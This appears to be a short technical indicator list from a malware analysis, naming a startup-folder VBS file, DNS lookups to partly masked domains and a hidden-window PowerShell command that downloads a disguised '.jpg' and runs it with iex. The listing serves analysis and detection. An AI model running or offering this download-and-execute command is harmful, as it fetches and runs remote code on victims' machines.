Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\ smss.vbs
- http://www.4u##.com/uploads/file_2020-03-20_124055.jpg
- DNS ASK 4u##.com
- DNS ASK bo####51.ddns.net
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('http://www.4u##.com/uploads/file_2020-03-20_124055.jpg')' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('http://www.4u##.com/uploads/file_2020-03-20_124055.jpg')